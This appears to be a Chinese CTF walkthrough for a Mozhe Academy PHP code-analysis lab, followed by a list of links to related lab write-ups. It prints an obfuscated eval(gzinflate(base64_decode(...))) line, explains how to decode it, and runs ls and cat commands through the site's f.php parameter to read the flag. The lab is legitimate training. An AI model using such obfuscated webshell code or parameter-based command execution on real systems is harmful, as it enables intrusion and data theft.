打开目标网址,提示flag在根目录
eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));
?>
这是gzinflate+base64_decode加密
最简单方法就是直接把eval改成echo输出,用php在线工具即可,附上php在线工具的网址:https://c.runoob.com/compile/1
echo gzinflate(base64_decode("40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=="));
?>
输入http://ip地址/f.php?a=ls 可以看到key文件,
输入http://ip地址/f.php?a=cat key_206292865031875.php 查看源代码即可获取key
打开目标网址,提示flag在根目录 eval(gzinflate(base64_decode(&40pNzshXS...
靶场地址:https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0Jm...
靶场地址:https://www.mozhe.cn/bug/detail/bW5QUExIRjVTaGlDYjVS...
靶场地址:https://www.mozhe.cn/bug/detail/ZVNlS096cEV0WHZsTzdK...
首先打开题目的网址,发现可以下载网站的源码,我们把网站的源码下载下来,用seay源代码审计系统找一下网站的漏洞 发...
靶场地址:https://www.mozhe.cn/bug/detail/RDBTOWFKOTJIODJRWlRw...
靶场地址:https://www.mozhe.cn/bug/detail/S3FBSGhXYlU2a09ybG83...
靶场地址:https://www.mozhe.cn/bug/detail/L3dtcFZpT0lXbVMrRW1G...
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1...
靶场地址:https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxz...
本文标题:墨者学院 - PHP代码分析溯源(第4题)
本文链接:https://www.haomeiwen.com/subject/mgvqoftx.html
网友评论